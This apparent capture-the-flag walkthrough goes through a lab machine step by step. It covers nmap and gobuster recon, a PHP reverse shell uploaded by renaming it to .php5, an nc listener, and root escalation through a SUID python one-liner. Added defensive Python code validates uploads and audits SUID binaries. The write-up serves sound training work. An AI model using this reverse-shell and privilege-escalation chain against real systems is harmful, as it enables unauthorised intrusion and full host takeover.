Reconnaissance
Scan the machine
nmap -sV -O <ip> -v    # -sV: probe service versions, -O: OS detection, -v: verbose output
Apache version
Check the previous output to find the correct version.
Service on port 22
Check the previous output to find the correct service name.
Find hidden directories on the web server
We can use Gobuster, as the room suggests, to find hidden directories.
gobuster dir -u <ip> -w /usr/share/wordlists/dirb/big.txt
The answer is listed in the output.
Getting a shell
Let's browse the website to this hidden directory to check what is behind it. There is a form to upload a file. Let's use it to upload a reverse shell.
Locate the reverse shell on the attack box
find / -name '*php-reverse-shell*' 2>/dev/null    # quote the glob so the shell does not expand it first
Then open the file and update the listener IP and port to match your configuration.
Then try to upload this file to the website. You will receive an error saying that PHP files are not allowed. The check only looks at the extension, so rename the file to another extension.
cp php-reverse-shell.php php-reverse-shell.php5
The upload succeeds.
Start the listener on your attack box first, on the port configured in the reverse shell file.
nc -nvlp 1234
Then go to the other interesting directory identified by the Gobuster scan to access the file you just uploaded. When you open the file, the shell pops up on the attack box.
Identify your current user and find the flag file (user.txt, as specified).
whoami
find / -name '*user.txt*' 2>/dev/null
cat {REDACTED}/user.txt
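The upload bypass above works because the server only rejects the literal `.php` extension, while Apache still executes `.php5`. The following Python is an added example, not code from the room or its website: it contrasts a denylist check modelled on that behaviour with a hardened upload check (my own design, with an assumed allowlist of image types) that validates magic bytes instead of trusting the name and stores the file under a server-generated name.

```python
import secrets
from typing import Optional, Tuple

# Weak filter, modelled on the behaviour observed in the room: only the
# literal ".php" extension is refused, so ".php5" (which Apache still hands
# to the PHP interpreter) gets through.
def denylist_allows(filename: str) -> bool:
    return not filename.lower().endswith(".php")

# Hardened filter (assumed design): a short allowlist of image types, each
# checked against the file's leading bytes rather than its name.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

SCRIPT_EXTENSIONS = {"php", "php5", "phtml", "phar", "phps"}

def sniff_type(data: bytes) -> Optional[str]:
    """Return the allowlisted type whose magic bytes match, or None."""
    for ext, magic in ALLOWED_TYPES.items():
        if data.startswith(magic):
            return ext
    return None

def hardened_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an upload of `data` named `filename`."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return False, "missing extension"
    claimed = "jpg" if parts[-1] == "jpeg" else parts[-1]
    if claimed not in ALLOWED_TYPES:
        return False, f"extension .{parts[-1]} not in allowlist"
    # Refuse double extensions such as shell.php.png; the generated storage
    # name already neutralises them, but the extra check is cheap.
    if any(p in SCRIPT_EXTENSIONS for p in parts[:-1]):
        return False, "script extension embedded in filename"
    actual = sniff_type(data)
    if actual != claimed:
        return False, f"content looks like {actual}, not {claimed}"
    return True, "ok"

def stored_name(ext: str) -> str:
    """Server-chosen name: the client never controls the stored extension."""
    return f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    # Constructed sample uploads, not files from the room.
    for name, data in [("php-reverse-shell.php5", b"<?php echo 1; ?>"),
                       ("pic.png", ALLOWED_TYPES["png"] + b"\x00" * 8)]:
        print(name, "denylist:", denylist_allows(name),
              "hardened:", hardened_check(name, data))
```

Pairing the allowlist with a web server that serves the upload directory with script execution disabled closes the same hole from the other side, so a mistake in either check does not by itself give an attacker code execution.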
Privilege Escalation
SUID permission
As requested, search for files with the SUID bit set:
find / -perm /4000 2>/dev/null
-perm /4000 matches files with the SUID bit set; 2>/dev/null hides the permission-denied errors from directories we cannot read.
The answer is in the output.
Then go to GTFOBins to find a way to escalate to root with the binary identified above. Execute the command:
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Then identify your new user and find the flag (root.txt):
whoami
find / -name root.txt 2>/dev/null
cat {REDACTED}/root.txt
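The SUID step above is exactly what a defender should be hunting for on their own hosts: an interpreter with the SUID bit set is a standing root escalation. The following Python is an added example, not code from the room: it triages a list of SUID paths (here a constructed sample of `find / -perm /4000` output) against an assumed Debian/Ubuntu baseline of binaries that legitimately carry SUID and a list of interpreters and utilities that never should, and it includes a live collector equivalent to the `find` command for running on a real host.

```python
import os
import stat
from typing import Dict, Iterable, List

# Binaries that legitimately carry SUID on a stock Debian/Ubuntu install
# (assumed baseline; replace it with the contents of your own golden image).
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/bin/fusermount",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Interpreters and utilities that run arbitrary commands; SUID on any of
# these is root for every local user, as the room shows with python.
NEVER_SUID_NAMES = {
    "python", "perl", "ruby", "php", "node", "lua", "bash", "sh", "dash",
    "zsh", "find", "vim", "vi", "nano", "less", "more", "awk", "gawk",
    "env", "cp", "mv", "tar", "nmap",
}

# Constructed sample of `find / -perm /4000 2>/dev/null` output, not the
# room's real listing.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/python
/usr/lib/openssh/ssh-keysign
/opt/backup/legacy-helper
"""

def classify(path: str) -> str:
    """'expected' (in baseline), 'critical' (interpreter/utility), or 'review'."""
    if path in EXPECTED_SUID:
        return "expected"
    name = os.path.basename(path)
    base = name.rstrip("0123456789.")   # python3.8 -> python, perl5.30 -> perl
    if name in NEVER_SUID_NAMES or base in NEVER_SUID_NAMES:
        return "critical"
    return "review"

def audit(paths: Iterable[str]) -> Dict[str, List[str]]:
    """Bucket SUID paths by severity; empty lines are ignored."""
    result: Dict[str, List[str]] = {"expected": [], "critical": [], "review": []}
    for p in paths:
        p = p.strip()
        if p:
            result[classify(p)].append(p)
    for bucket in result.values():
        bucket.sort()
    return result

def collect_suid(root: str = "/") -> List[str]:
    """Live equivalent of `find / -perm /4000`: regular files with S_ISUID."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for f in filenames:
            full = os.path.join(dirpath, f)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return found

if __name__ == "__main__":
    # Swap in collect_suid() to audit the host this runs on.
    for bucket, paths in audit(SAMPLE_FIND_OUTPUT.splitlines()).items():
        print(bucket, paths)
```

Anything in the `critical` bucket should be fixed immediately (`chmod u-s`) and its origin investigated, since SUID on an interpreter is rarely an accident; the `review` bucket is where unfamiliar custom helpers land for a manual look.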
And the room is done.